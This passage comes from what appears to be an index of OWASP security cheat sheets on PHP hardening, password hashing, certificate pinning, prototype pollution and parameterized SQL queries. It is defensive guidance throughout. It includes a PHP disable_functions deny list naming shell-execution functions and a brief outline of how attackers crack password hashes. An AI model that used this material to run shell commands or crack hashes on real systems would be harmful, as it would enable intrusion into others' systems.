doc_root                = /path/DocumentRoot/PHP-scripts/\nopen_basedir            = /path/DocumentRoot/PHP-scripts/\ninclude_path            = /path/PHP-pear/\nextension_dir           = /path/PHP-extensions/\nmime_magic.magicfile    = /path/PHP-magic.mime\nallow_url_fopen         = Off\nallow_url_include       = Off\nvariables_order         = \"GPCS\"\nallow_webdav_methods    = Off\nsession.gc_maxlifetime  = 600\n

Setting allow_url_* to Off prevents LFIs from being easily escalated to RFIs.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-file-upload-handling","title":"PHP file upload handling","text":"
file_uploads         = On\nupload_tmp_dir       = /path/PHP-uploads/\nupload_max_filesize  = 2M\nmax_file_uploads     = 2\n

If your application is not using file uploads, and the only data the user will enter / upload is forms that do not require any document attachments, file_uploads should be turned Off.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-executable-handling","title":"PHP executable handling","text":"
enable_dl          = Off\ndisable_functions  = system, exec, shell_exec, passthru, phpinfo, show_source, highlight_file, popen, proc_open, fopen_with_path, dbmopen, dbase_open, putenv, move_uploaded_file, chdir, mkdir, rmdir, chmod, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo\n# see also: http://ir.php.net/features.safe-mode\ndisable_classes    =\n

These are dangerous PHP functions. You should disable all that you don't use.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-session-handling","title":"PHP session handling","text":"

Session settings are some of the MOST important values to concentrate on when configuring PHP. It is a good practice to change session.name to something new.

session.save_path                = /path/PHP-session/\nsession.name                     = myPHPSESSID\nsession.auto_start               = Off\nsession.use_trans_sid            = 0\nsession.cookie_domain            = full.qualified.domain.name\n#session.cookie_path             = /application/path/\nsession.use_strict_mode          = 1\nsession.use_cookies              = 1\nsession.use_only_cookies         = 1\nsession.cookie_lifetime          = 14400 # 4 hours\nsession.cookie_secure            = 1\nsession.cookie_httponly          = 1\nsession.cookie_samesite          = Strict\nsession.cache_expire             = 30\nsession.sid_length               = 256\nsession.sid_bits_per_character   = 6 # PHP 7.2+\nsession.hash_function            = 1 # PHP 7.0-7.1\nsession.hash_bits_per_character  = 6 # PHP 7.0-7.1\n
"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#some-more-security-paranoid-checks","title":"Some more security paranoid checks","text":"
session.referer_check  = /application/path\nmemory_limit           = 50M\npost_max_size          = 20M\nmax_execution_time     = 60\nreport_memleaks        = On\ntrack_errors           = Off\nhtml_errors            = Off\n
"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#suhosin","title":"Suhosin","text":"

Suhosin is a patch to PHP which provides a number of hardening and security features that are not available in the default PHP build. However, Suhosin only works with PHP 5, which is unsupported and should not be used.

For PHP 7, there is Suhosin-ng, but it's in a prerelease stage, and as such should not be used in production.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#snuffleupagus","title":"Snuffleupagus","text":"

Snuffleupagus is the spiritual descendent of Suhosin for PHP 7 and onwards, with modern features. It's considered stable, and is usable in production.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html","title":"Password Storage Cheat Sheet","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#introduction","title":"Introduction","text":"

It is essential to store passwords in a way that prevents them from being obtained by an attacker even if the application or database is compromised. The majority of modern languages and frameworks provide built-in functionality to help store passwords safely.

After an attacker has acquired stored password hashes, they are always able to brute force hashes offline. As a defender, it is only possible to slow down offline attacks by selecting hash algorithms that are as resource intensive as possible.

This cheat sheet provides guidance on the various areas that need to be considered related to storing passwords. In short:

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#background","title":"Background","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#hashing-vs-encryption","title":"Hashing vs Encryption","text":"

Hashing and encryption both provide ways to keep sensitive data safe. However, in almost all circumstances, passwords should be hashed, NOT encrypted.

Hashing is a one-way function (i.e., it is impossible to \"decrypt\" a hash and obtain the original plaintext value). Hashing is appropriate for password validation. Even if an attacker obtains the hashed password, they cannot enter it into an application's password field and log in as the victim.

Encryption is a two-way function, meaning that the original plaintext can be retrieved. Encryption is appropriate for storing data such as a user's address since this data is displayed in plaintext on the user's profile. Hashing their address would result in a garbled mess.

In the context of password storage, encryption should only be used in edge cases where it is necessary to obtain the original plaintext password. This might be necessary if the application needs to use the password to authenticate with another system that does not support a modern way to programmatically grant access, such as OpenID Connect (OIDC). Where possible, an alternative architecture should be used to avoid the need to store passwords in an encrypted form.

For further guidance on encryption, see the Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#how-attackers-crack-password-hashes","title":"How Attackers Crack Password Hashes","text":"

Although it is not possible to \"decrypt\" password hashes to obtain the original passwords, it is possible to \"crack\" the hashes in some circumstances.

The basic steps are:

This process is repeated for a large number of potential candidate passwords. Different methods can be used to select candidate passwords, including:

While the number of permutations can be enormous, with high speed hardware (such as GPUs) and cloud services with many servers for rent, the cost to an attacker of successful password cracking is relatively small, especially when best practices for hashing are not followed.

Strong passwords stored with modern hashing algorithms and using hashing best practices should be effectively impossible for an attacker to crack. It is your responsibility as an application owner to select a modern hashing algorithm.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#password-storage-concepts","title":"Password Storage Concepts","text":""},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#salting","title":"Salting","text":"

A salt is a unique, randomly generated string that is added to each password as part of the hashing process. As the salt is unique for every user, an attacker has to crack hashes one at a time using the respective salt rather than calculating a hash once and comparing it against every stored hash. This makes cracking large numbers of hashes significantly harder, as the time required grows in direct proportion to the number of hashes.

Salting also protects against an attacker pre-computing hashes using rainbow tables or database-based lookups. Finally, salting means that it is impossible to determine whether two users have the same password without cracking the hashes, as the different salts will result in different hashes even if the passwords are the same.

Modern hashing algorithms such as Argon2id, bcrypt, and PBKDF2 automatically salt the passwords, so no additional steps are required when using them.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#peppering","title":"Peppering","text":"

A pepper can be used in addition to salting to provide an additional layer of protection. The purpose of the pepper is to prevent an attacker from being able to crack any of the hashes if they only have access to the database, for example, if they have exploited a SQL injection vulnerability or obtained a backup of the database.

One of several peppering strategies is to hash the passwords as usual (using a password hashing algorithm) and then HMAC or encrypt the hashes with a symmetric encryption key before storing the password hash in the database, with the key acting as the pepper. Peppering strategies do not affect the password hashing function in any way.

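A sketch of the HMAC-based peppering strategy described above, using Node's built-in crypto module. The environment variable name is made up; in practice the pepper should be loaded from a secrets store or HSM, never from the database that holds the hashes.

const crypto = require('crypto');\n\nconst pepper = process.env.PASSWORD_PEPPER; // kept outside the database\n\n// hash the password as usual (e.g. Argon2id or bcrypt), then HMAC the result with the pepper\nfunction pepperHash(passwordHash) {\nreturn crypto.createHmac('sha256', pepper).update(passwordHash).digest('hex');\n}\n\n// store pepperHash(passwordHash) in the database instead of the bare password hash\n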
"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#work-factors","title":"Work Factors","text":"

The work factor is essentially the number of iterations of the hashing algorithm that are performed for each password (usually, it's actually 2^work iterations). The purpose of the work factor is to make calculating the hash more computationally expensive, which in turn reduces the speed and/or increases the cost for which an attacker can attempt to crack the password hash. The work factor is typically stored in the hash output.

When choosing a work factor, a balance needs to be struck between security and performance. Higher work factors will make the hashes more difficult for an attacker to crack but will also make the process of verifying a login attempt slower. If the work factor is too high, this may degrade the performance of the application and could also be used by an attacker to carry out a denial of service attack by making a large number of login attempts to exhaust the server's CPU.

There is no golden rule for the ideal work factor - it will depend on the performance of the server and the number of users on the application. Determining the optimal work factor will require experimentation on the specific server(s) used by the application. As a general rule, calculating a hash should take less than one second.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#upgrading-the-work-factor","title":"Upgrading the Work Factor","text":"

One key advantage of having a work factor is that it can be increased over time as hardware becomes more powerful and cheaper.

The most common approach to upgrading the work factor is to wait until the user next authenticates and then to re-hash their password with the new work factor. This means that different hashes will have different work factors and may result in hashes never being upgraded if the user doesn't log back into the application. Depending on the application, it may be appropriate to remove the older password hashes and require users to reset their passwords next time they need to login in order to avoid storing older and less secure hashes.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#password-hashing-algorithms","title":"Password Hashing Algorithms","text":"

There are a number of modern hashing algorithms that have been specifically designed for securely storing passwords. This means that they should be slow (unlike algorithms such as MD5 and SHA-1, which were designed to be fast), and how slow they are can be configured by changing the work factor.

Websites should not hide which password hashing algorithm they use. If you utilize a modern password hashing algorithm with proper configuration parameters, it should be safe to state in public which password hashing algorithms are in use and be listed here.

The main three algorithms that should be considered are listed below:

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#argon2id","title":"Argon2id","text":"

Argon2 is the winner of the 2015 Password Hashing Competition. There are three different versions of the algorithm, and the Argon2id variant should be used, as it provides a balanced approach to resisting both side-channel and GPU-based attacks.

Rather than a simple work factor like other algorithms, Argon2id has three different parameters that can be configured. Argon2id should use one of the following configuration settings as a base minimum which includes the minimum memory size (m), the minimum number of iterations (t) and the degree of parallelism (p).

These configuration settings are equivalent in the defense they provide. The only difference is a trade off between CPU and RAM usage.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#scrypt","title":"scrypt","text":"

scrypt is a password-based key derivation function created by Colin Percival. While Argon2id should be the best choice for password hashing, scrypt should be used when the former is not available.

Like Argon2id, scrypt has three different parameters that can be configured. scrypt should use one of the following configuration settings as a base minimum which includes the minimum CPU/memory cost parameter (N), the blocksize (r) and the degree of parallelism (p).

These configuration settings are equivalent in the defense they provide. The only difference is a trade off between CPU and RAM usage.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#bcrypt","title":"bcrypt","text":"

The bcrypt password hashing function should be the best choice for password storage in legacy systems or if PBKDF2 is required to achieve FIPS-140 compliance.

The work factor should be as large as verification server performance will allow, with a minimum of 10.

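A minimal sketch using the bcrypt npm package; the work factor of 12 is only an illustrative value, to be tuned from your own server benchmarks with the minimum of 10 noted above.

const bcrypt = require('bcrypt');\n\nconst workFactor = 12; // tune per server performance; minimum of 10\n\nasync function register(password) {\nreturn await bcrypt.hash(password, workFactor); // salt is generated and embedded automatically\n}\n\nasync function verify(password, storedHash) {\nreturn await bcrypt.compare(password, storedHash);\n}\n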
"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#input-limits","title":"Input Limits","text":"

bcrypt has a maximum input length of 72 bytes for most implementations. To protect against this issue, a maximum password length of 72 bytes (or less if the implementation in use has smaller limits) should be enforced when using bcrypt.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pre-hashing-passwords","title":"Pre-Hashing Passwords","text":"

An alternative approach is to pre-hash the user-supplied password with a fast algorithm such as SHA-256, and then to hash the resulting hash with bcrypt (i.e., bcrypt(base64(hmac-sha256(data:$password, key:$pepper)), $salt, $cost)). This is a dangerous (but common) practice that should be avoided due to password shucking and other issues when combining bcrypt with other hash functions.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2","title":"PBKDF2","text":"

PBKDF2 is recommended by NIST and has FIPS-140 validated implementations. So, it should be the preferred algorithm when these are required.

PBKDF2 requires that you select an internal hashing algorithm such as an HMAC or a variety of other hashing algorithms. HMAC-SHA-256 is widely supported and is recommended by NIST.

The work factor for PBKDF2 is implemented through an iteration count, which should be set differently based on the internal hashing algorithm used.

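For illustration, Node's built-in crypto module exposes PBKDF2 directly. The iteration count below is a placeholder to be set according to the internal hash function and current guidance, and the password value is made up.

const crypto = require('crypto');\n\nconst password = 'user-supplied password';\nconst iterations = 600000; // placeholder; set per the internal hash and current guidance\nconst salt = crypto.randomBytes(16);\n\ncrypto.pbkdf2(password, salt, iterations, 32, 'sha256', function (err, derivedKey) {\nif (err) throw err;\n// store the salt, iteration count and derived key together (e.g. in PHC string format)\nconsole.log(derivedKey.toString('hex'));\n});\n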
"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#parallel-pbkdf2","title":"Parallel PBKDF2","text":"

These configuration settings are equivalent in the defense they provide. (Numbers as of December 2022, based on testing of RTX 4000 GPUs.)

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2-pre-hashing","title":"PBKDF2 Pre-hashing","text":"

When PBKDF2 is used with an HMAC, and the password is longer than the hash function's block size (64 bytes for SHA-256), the password will be automatically pre-hashed. For example, the password \"This is a password longer than 512 bits which is the block size of SHA-256\" is converted to the hash value (in hex): fa91498c139805af73f7ba275cca071e78d78675027000c99a9925e2ec92eedd.

A good implementation of PBKDF2 will perform pre-hashing before the expensive iterated hashing phase, but some implementations perform the conversion on each iteration. This can make hashing long passwords significantly more expensive than hashing short passwords. If a user can supply very long passwords, there is a potential denial of service vulnerability, such as the one published in Django in 2013. Manual pre-hashing can reduce this risk but requires adding a salt to the pre-hash step.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#upgrading-legacy-hashes","title":"Upgrading Legacy Hashes","text":"

For older applications built using less secure hashing algorithms such as MD5 or SHA-1, these hashes should be upgraded to modern password hashing algorithms as described above. When the user next enters their password (usually by authenticating on the application), it should be re-hashed using the new algorithm. It would also be good practice to expire the users' current password and require them to enter a new one so that any older (less secure) hashes of their password are no longer useful to an attacker.

However, this approach means that old (less secure) password hashes will be stored in the database until the user logs in. Two main approaches can be taken to avoid this dilemma.

One method is to expire and delete the password hashes of users who have been inactive for an extended period and require them to reset their passwords to login again. Although secure, this approach is not particularly user-friendly. Expiring the passwords of many users may cause issues for support staff or may be interpreted by users as an indication of a breach.

An alternative approach is to use the existing password hashes as inputs for a more secure algorithm. For example, if the application originally stored passwords as md5($password), this could be easily upgraded to bcrypt(md5($password)). Layering the hashes avoids the need to know the original password; however, it can make the hashes easier to crack. These hashes should be replaced with direct hashes of the users' passwords next time the user logs in.

Assume that whatever password hashing method is selected will have to be upgraded in the future. Ensure that upgrading your hashing algorithm is as easy as possible. For a transition period, allow for a mix of old and new hashing algorithms. Using a mix of hashing algorithms is easier if the password hashing algorithm and work factor are stored with the password using a standard format, for example, the modular PHC string format.

"},{"location":"cheatsheets/Password_Storage_Cheat_Sheet.html#international-characters","title":"International Characters","text":"

Ensure your hashing library is able to accept a wide range of characters and is compatible with all Unicode codepoints. Users should be able to use the full range of characters available on modern devices, in particular mobile keyboards. They should be able to select passwords from various languages and include pictograms. Prior to hashing, the entropy of the user's entry should not be reduced. Password hashing libraries need to be able to use input that may contain a NULL byte.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html","title":"Pinning Cheat Sheet","text":""},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Pinning Cheat Sheet is a technical guide to implementing certificate and public key pinning as discussed at the Virginia chapter's presentation Securing Wireless Channels in the Mobile Space. This guide is focused on providing clear, simple, actionable guidance for securing the channel in a hostile environment where actors could be malicious and the conference of trust a liability.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#whats-the-problem","title":"What's the problem","text":"

Users, developers, and applications expect end-to-end security on their secure channels, but some secure channels are not meeting the expectation. Specifically, channels built using well known protocols such as VPN, SSL, and TLS can be vulnerable to a number of attacks.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#what-is-pinning","title":"What Is Pinning","text":"

Pinning is the process of associating a host with their expected X509 certificate or public key. Once a certificate or public key is known or seen for a host, the certificate or public key is associated or 'pinned' to the host. If more than one certificate or public key is acceptable, then the program holds a pinset (a term taken from the Jon Larimer and Kenny Root Google I/O talk). In this case, the advertised identity must match one of the elements in the pinset.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-to-add-a-pin","title":"When to Add a Pin","text":"

A host or service's certificate or public key can be added to an application at development time, or it can be added upon first encountering the certificate or public key. The former - adding at development time - is preferred since preloading the certificate or public key out of band usually means the attacker cannot taint the pin.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-do-you-perform-pinning","title":"When Do You Perform Pinning","text":"

You should pin anytime you want to be relatively certain of the remote host's identity or when operating in a hostile environment. Since one or both are almost always true, you should probably pin all the time.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-do-you-not-pin","title":"When Do You Not Pin?","text":"

Pinning requires control of upcoming certificate attributes. If the certificate key pair cannot be predicted in advance before it is put into service, then pinning will lead to an outage when the endpoint presents a new certificate. For instance, if a certificate provider generates random key pairs whenever a certificate is rotated, and you cannot control when this certificate is put into use, then you will not be able to update your clients until they have already experienced an outage.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#when-to-apply-exceptions","title":"When to Apply Exceptions","text":"

If you are working for an organization which practices \"egress filtering\" as part of a Data Loss Prevention (DLP) strategy, you will likely encounter Interception Proxies. I like to refer to these things as \"good\" bad actors (as opposed to \"bad\" bad actors) since both break end-to-end security and we can't tell them apart. In this case, do not offer to allow-list the interception proxy since it defeats your security goals. Add the interception proxy's public key to your pinset after being instructed to do so by the folks in Risk Acceptance.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#how-do-you-pin","title":"How Do You Pin","text":"

The idea is to re-use the existing protocols and infrastructure, but use them in a hardened manner. For re-use, a program would keep doing the things it used to do when establishing a secure connection.

To harden the channel, the program would take advantage of the OnConnect callback offered by a library, framework or platform. In the callback, the program would verify the remote host's identity by validating its certificate or public key. See some examples below.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#what-should-be-pinned","title":"What Should Be Pinned","text":"

To decide what should be pinned, follow these steps.

  1. Decide if you want to pin the root CA, intermediate CA or leaf certificate:

    For example, the application pins the remote endpoint leaf certificate but includes a backup pin for the intermediate CA. This increases the risk by trusting more certificate authorities but decreases the chances of bricking your app. If there's any issue with the leaf certificate, the app can always fall back to the intermediate CA until you release an app update.

  2. Choose if you want to pin the whole certificate or just its public key.

  3. If you chose the public key, you have two additional choices:

     - Pin the subjectPublicKeyInfo.

     - Pin one of the concrete types such as RSAPublicKey or DSAPublicKey.

The three choices are explained below in more detail. I would encourage you to pin the subjectPublicKeyInfo because it has the public parameters (such as {e,n} for an RSA public key) and contextual information such as an algorithm and OID. The context will help you keep your bearings at times.
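
As a rough Java illustration (not a drop-in implementation), the check inside a connection callback could compare a SHA-256 digest of the peer's subjectPublicKeyInfo against an embedded pin; serverCert and expectedPinDigest are placeholders supplied by your TLS callback and your pin store, and a vetted library or platform feature should be preferred over hand-rolled validation:

import java.security.MessageDigest;\nimport java.security.cert.CertificateException;\nimport java.security.cert.X509Certificate;\n\nstatic void verifyPin(X509Certificate serverCert, byte[] expectedPinDigest) throws Exception {\n// getEncoded() on a Java PublicKey returns the DER-encoded subjectPublicKeyInfo\nbyte[] spki = serverCert.getPublicKey().getEncoded();\nbyte[] digest = MessageDigest.getInstance(\"SHA-256\").digest(spki);\n\n// Constant-time comparison against the embedded pin\nif (!MessageDigest.isEqual(digest, expectedPinDigest)) {\nthrow new CertificateException(\"Public key pin mismatch - closing connection\");\n}\n}\n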

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#certificate","title":"Certificate","text":"

The certificate is easiest to pin. You can fetch the certificate out of band for the website, have the IT folks email your company certificate to you, use openssl s_client to retrieve the certificate, etc. At runtime, you retrieve the website or server's certificate in the callback. Within the callback, you compare the retrieved certificate with the certificate embedded within the program. If the comparison fails, then fail the method or function.

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#public-key","title":"Public Key","text":"

Public key pinning is more flexible but a little trickier due to the extra steps necessary to extract the public key from a certificate. As with a certificate, the program checks the extracted public key against its embedded copy of the public key.

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#hash","title":"Hash","text":"

While the three choices above use DER encoding, it's also acceptable to use a hash of the information. In fact, the original sample programs were written using digested certificates and public keys. The samples were changed to allow a programmer to inspect the objects with tools like dumpasn1 and other ASN.1 decoders.

Benefits:

Downsides:

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#examples-of-pinning","title":"Examples of Pinning","text":"

This section discusses certificate and public key pinning in Android Java, iOS, .Net, and OpenSSL. Code has been omitted for brevity, but the key points for the platform are highlighted.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#android","title":"Android","text":"

Since Android N, the preferred way for implementing pinning is by leveraging Android's Network Security Configuration feature, which lets apps customize their network security settings in a safe, declarative configuration file without modifying app code.

To enable pinning, the <pin-set> configuration setting can be used.

If devices running a version of Android that is earlier than N need to be supported, a backport of the Network Security Configuration pinning functionality is available via the TrustKit Android library.

Alternatively, you can use methods such as OkHttp's certificate pinning in order to set specific pins programmatically, as explained in the OWASP Mobile Security Testing Guide (MSTG) and the OkHttp documentation; a minimal sketch follows.
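
A minimal sketch using OkHttp's CertificatePinner (the host name and base64 SPKI hashes below are placeholders; generate your own pins and always include a backup pin):

import okhttp3.CertificatePinner;\nimport okhttp3.OkHttpClient;\n\n// Placeholder pins - replace with the SHA-256 hashes of your own subjectPublicKeyInfo\nCertificatePinner certificatePinner = new CertificatePinner.Builder()\n.add(\"api.example.com\", \"sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\")\n.add(\"api.example.com\", \"sha256/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=\") // backup pin\n.build();\n\nOkHttpClient client = new OkHttpClient.Builder()\n.certificatePinner(certificatePinner)\n.build();\n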

The Android documentation provides an example of how SSL validation can be customized within the app's code (in order to implement pinning) in the Unknown CA implementation document. However, implementing pinning validation from scratch should be avoided, as implementation mistakes are extremely likely and usually lead to severe vulnerabilities.

Lastly, if you want to validate whether the pinning is successful, please follow the instructions from the introduction to testing network communication and the Android-specific network testing chapters of the OWASP Mobile Security Testing Guide (MSTG).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#ios","title":"iOS","text":"

Apple suggests pinning a CA public key by specifying it in the Info.plist file under App Transport Security Settings. More details can be found in the article \"Identity Pinning: How to configure server certificates for your app\".

TrustKit, an open-source SSL pinning library for iOS and macOS, is also available. It provides an easy-to-use API for implementing pinning and has been deployed in many apps.

Otherwise, more details regarding how SSL validation can be customized on iOS (in order to implement pinning) are available in the HTTPS Server Trust Evaluation technical note. However, implementing pinning validation from scratch should be avoided, as implementation mistakes are extremely likely and usually lead to severe vulnerabilities.

Lastly, if you want to validate whether the pinning is successful, please follow the instructions from the introduction to testing network communication and the iOS-specific network testing chapters of the OWASP Mobile Security Testing Guide (MSTG).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#net","title":".Net","text":"

.Net pinning can be achieved by using ServicePointManager. An example can be found at the OWASP MSTG.

Download the .Net sample program.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#openssl","title":"OpenSSL","text":"

Pinning can occur at one of two places with OpenSSL. First is the user supplied verify_callback. Second is after the connection is established via SSL_get_peer_certificate. Either method will allow you to access the peer's certificate.

Though OpenSSL performs the X509 checks, you must fail the connection and tear down the socket on error. By design, a server that does not supply a certificate will result in X509_V_OK with a NULL certificate. To check the result of the customary verification:

  1. You must call SSL_get_verify_result and verify the return code is X509_V_OK;
  2. You must call SSL_get_peer_certificate and verify the certificate is non-NULL.

Download: OpenSSL sample program.

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#electron","title":"Electron","text":"

electron-ssl-pinning is an open-source SSL pinning library for Electron-based applications. It provides an easy-to-use API for implementing pinning and also provides a tool for fetching configuration based on the needed hosts.

Otherwise, you can validate certificates by yourself using ses.setCertificateVerifyProc(proc).

"},{"location":"cheatsheets/Pinning_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html","title":"Prototype Pollution Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#explanation","title":"Explanation","text":"

Prototype Pollution is a critical vulnerability that can allow attackers to manipulate an application's JavaScript objects and properties, leading to serious security issues such as unauthorized access to data, privilege escalation, and even remote code execution.

For examples of why this is dangerous, see the links in the Other resources section below.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#suggested-protection-mechanisms","title":"Suggested protection mechanisms","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-new-set-or-new-map","title":"Use \"new Set()\" or \"new Map()\"","text":"

Developers should use new Set() or new Map() instead of using object literals:

let allowedTags = new Set();\nallowedTags.add('b');\nif(allowedTags.has('b')){\n//...\n}\n\nlet options = new Map();\noptions.set('spaces', 1);\nlet spaces = options.get('spaces')\n
"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#if-objects-or-object-literals-are-required","title":"If objects or object literals are required","text":"

If objects have to be used then they should be created using the Object.create(null) API to ensure they don't inherit from the Object prototype:

let obj = Object.create(null);\n

If object literals are required then as a last resort you could use the __proto__ property:

let obj = {__proto__:null};\n
"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-object-freeze-and-seal-mechanisms","title":"Use object \"freeze\" and \"seal\" mechanisms","text":"

You can also use the Object.freeze() and Object.seal() APIs to prevent built-in prototypes from being modified; however, this can break the application if the libraries it uses modify the built-in prototypes.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#nodejs-configuration-flag","title":"Node.js configuration flag","text":"

Node.js also offers the ability to remove the __proto__ property completely using the --disable-proto=delete flag. Note that this is a defense-in-depth measure.

Prototype pollution is still possible using constructor.prototype properties but removing __proto__ helps reduce attack surface and prevent certain attacks.

"},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#other-resources","title":"Other resources","text":""},{"location":"cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#credits","title":"Credits","text":"

Credit to Gareth Heyes for providing the original protection guidance in this comment.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html","title":"Query Parameterization Cheat Sheet","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

SQL Injection is one of the most dangerous web vulnerabilities. So much so that it was the #1 item in both the OWASP Top 10 2013 version, and 2017 version. As of 2021, it sits at #3 on the OWASP Top 10.

It represents a serious threat because SQL Injection allows attacker-supplied input to change the structure of a web application's SQL statement in a way that can steal data, modify data, or potentially facilitate command injection to the underlying OS.

This cheat sheet is a derivative work of the SQL Injection Prevention Cheat Sheet.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#parameterized-query-examples","title":"Parameterized Query Examples","text":"

SQL Injection is best prevented through the use of parameterized queries. The following chart demonstrates, with real-world code samples, how to build parameterized queries in most of the common web languages. The purpose of these code samples is to demonstrate to the web developer how to avoid SQL Injection when building database queries within a web application.

Please note, many client side frameworks and libraries offer client side query parameterization. These libraries often just build queries with string concatenation before sending raw queries to a server. Please ensure that query parameterization is done server-side!

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#prepared-statement-examples","title":"Prepared Statement Examples","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-java-built-in-feature","title":"Using Java built-in feature","text":"
String custname = request.getParameter(\"customerName\");\nString query = \"SELECT account_balance FROM user_data WHERE user_name = ? \";  PreparedStatement pstmt = connection.prepareStatement( query );\npstmt.setString( 1, custname);\nResultSet results = pstmt.executeQuery( );\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-java-with-hibernate","title":"Using Java with Hibernate","text":"
// HQL\n@Entity // declare as entity;\n@NamedQuery(\nname=\"findByDescription\",\nquery=\"FROM Inventory i WHERE i.productDescription = :productDescription\"\n)\npublic class Inventory implements Serializable {\n@Id\nprivate long id;\nprivate String productDescription;\n}\n\n// Use case\n// This should REALLY be validated too\nString userSuppliedParameter = request.getParameter(\"Product-Description\");\n// Perform input validation to detect attacks\nList<Inventory> list =\nsession.getNamedQuery(\"findByDescription\")\n.setParameter(\"productDescription\", userSuppliedParameter).list();\n\n// Criteria API\n// This should REALLY be validated too\nString userSuppliedParameter = request.getParameter(\"Product-Description\");\n// Perform input validation to detect attacks\nInventory inv = (Inventory) session.createCriteria(Inventory.class).add\n(Restrictions.eq(\"productDescription\", userSuppliedParameter)).uniqueResult();\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-net-built-in-feature","title":"Using .NET built-in feature","text":"
String query = \"SELECT account_balance FROM user_data WHERE user_name = ?\";\ntry {\nOleDbCommand command = new OleDbCommand(query, connection);\ncommand.Parameters.Add(new OleDbParameter(\"customerName\", CustomerName Name.Text));\nOleDbDataReader reader = command.ExecuteReader();\n// \u2026\n} catch (OleDbException se) {\n// error handling\n}\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-asp-net-built-in-feature","title":"Using ASP .NET built-in feature","text":"
string sql = \"SELECT * FROM Customers WHERE CustomerId = @CustomerId\";\nSqlCommand command = new SqlCommand(sql);\ncommand.Parameters.Add(new SqlParameter(\"@CustomerId\", System.Data.SqlDbType.Int));\ncommand.Parameters[\"@CustomerId\"].Value = 1;\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-ruby-with-activerecord","title":"Using Ruby with ActiveRecord","text":"
## Create\nProject.create!(:name => 'owasp')\n## Read\nProject.all(:conditions => \"name = ?\", name)\nProject.all(:conditions => { :name => name })\nProject.where(\"name = :name\", :name => name)\n## Update\nproject.update_attributes(:name => 'owasp')\n## Delete\nProject.delete(:name => 'name')\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-ruby-built-in-feature","title":"Using Ruby built-in feature","text":"
insert_new_user = db.prepare \"INSERT INTO users (name, age, gender) VALUES (?, ? ,?)\"\ninsert_new_user.execute 'aizatto', '20', 'male'\n
